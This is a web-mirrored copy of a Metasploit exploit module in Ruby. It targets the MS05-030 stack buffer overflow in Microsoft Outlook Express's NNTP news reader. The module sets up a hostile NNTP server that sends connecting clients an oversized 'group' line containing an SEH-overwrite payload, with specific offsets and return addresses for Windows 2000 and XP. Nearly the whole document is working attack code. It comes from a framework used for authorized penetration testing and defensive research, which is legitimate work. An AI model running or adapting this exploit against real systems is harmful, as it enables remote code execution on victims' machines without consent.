Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/nntp/ms05_030_nntp.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the news reader of Microsoft

19
          Outlook Express.

20
        },

21
        'Author' => 'MC',

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2005-1213' ],

25
          [ 'OSVDB', '17306' ],

26
          [ 'BID', '13951' ],

27
          [ 'MSB', 'MS05-030' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
          'AllowWin32SEH' => true

32
        },

33
        'Payload' => {

34
          'Space' => 750,

35
          'BadChars' => "\x00",

36
          'MaxNops' => 0,

37
          'StackAdjustment' => -3500,

38
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

39
        },

40
        'Platform' => 'win',

41
        'Targets' => [

42
          ['Windows 2000 English SP0-SP4', { 'Offset' => 9624, 'Ret' => 0x75022ac4 }],

43
          ['Windows XP English SP0/SP1', { 'Offset' => 9596, 'Ret' => 0x71aa2461 }],

44
        ],

45
        'Privileged' => false,

46
        'DisclosureDate' => '2005-06-14',

47
        'DefaultTarget' => 0,

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        OptPort.new('SRVPORT', [ true, "The NNTPServer daemon port to listen on", 119 ])

59
      ]

60
    )

61
  end

62


63
  def on_client_connect(client)

64
    yup = "200\r\n"

65


66
    client.put(yup)

67
    client.put(yup)

68
  end

69


70
  def on_client_data(client)

71
    return if ((p = regenerate_payload(client)) == nil)

72


73
    filler = "215 list\r\n" + "group "

74
    filler << rand_text_english(target['Offset'])

75
    seh = generate_seh_payload(target.ret)

76
    sploit = filler + seh + " 1 y\r\n\.\r\n"

77


78
    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")

79
    client.put(sploit)

80


81
    handler

82
    service.close_client(client)

83
  end

84
end

85


86